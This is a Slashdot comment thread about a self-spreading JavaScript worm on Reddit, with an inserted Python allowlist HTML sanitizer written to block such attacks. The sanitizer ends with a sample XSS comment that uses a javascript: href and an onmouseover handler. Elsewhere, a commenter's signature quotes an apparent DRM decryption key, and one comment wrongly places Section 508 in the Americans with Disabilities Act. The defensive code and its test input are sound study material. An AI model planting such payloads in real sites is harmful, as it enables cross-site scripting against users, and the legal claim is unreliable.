Reddit Javascript Exploit Spreading Virally
Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."
This is a flaw in Reddit's comment system that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover"; that is the point.
Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.
God invented whiskey so the Irish would not rule the world.
KeyserSosa: Thanks for this (and thanks aedes). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.
So obviously this is no longer spreading.
09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.
Nerd rage is the funniest rage.
Incidentally, I went to mod this and it failed... multiple times.
Though it eventually worked, I am not impressed.
It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.
The correct solution is a whitelisted HTML parser and generator, like HTML Purifier.
No it's not. The Reddit hack was a Cross Site Scripting attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were run to directly put data into the database. It's an entirely different vector and an entirely different vulnerability; all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.
Section 501 only applies to government websites, and really, it should apply to crappy screen readers that can't handle javascript.
Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.
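The allowlist approach that the HTML Purifier comment and the "filtering user input" comment above both argue for, as an added example (not Reddit's markdown.py, not HTML Purifier). It uses only Python's standard html.parser, and the sample comments it runs on are constructed here. The point it shows: with an allowlist, an onmouseover handler or a javascript: href is never inspected for badness, it is dropped because it is not on the list, and the record of what was dropped is what you would log.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist: anything not named here is dropped, never passed through.
ALLOWED_TAGS = {"p", "a", "em", "strong", "code", "pre", "blockquote", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}          # no on* handlers anywhere
SAFE_SCHEMES = ("http://", "https://", "mailto:", "/")
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags and attributes; drop everything else."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.stack, self.dropped = [], [], []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag:{tag}")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, ()):
                self.dropped.append(f"attr:{tag}@{name}")   # catches every on* handler
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                self.dropped.append(f"href:{value}")          # catches javascript:/data: URLs
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:                 # close only what we actually opened
            while self.stack:
                top = self.stack.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))   # text is always re-escaped

    def result(self):
        self.close()
        while self.stack:                     # balance anything left open
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize(html):
    """Return (clean_html, list_of_dropped_items) for one untrusted comment."""
    s = AllowlistSanitizer()
    s.feed(html)
    return s.result(), s.dropped


# Constructed sample shaped like the hover-triggered comment described above.
WORM_COMMENT = '<a href="javascript:alert(1)" onmouseover="doPost(location.href)">hover me</a>'
```

Content of a dropped container such as `<script>` still comes out as escaped text, which is harmless but visible; a production sanitizer would also suppress it.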
I think you're talking about Section 508 of the Americans with Disabilities Act. And yes, it can apply to more than US Government web sites. Target found that out the hard way after refusing to provide alt tags and other accessible changes to their web site. After getting slammed with a $6 million judgement, no one else is bothering to refute what has become established case law.
I might also add that Section 508 covers much more than screen readers and javascript.
This space intentionally left blank.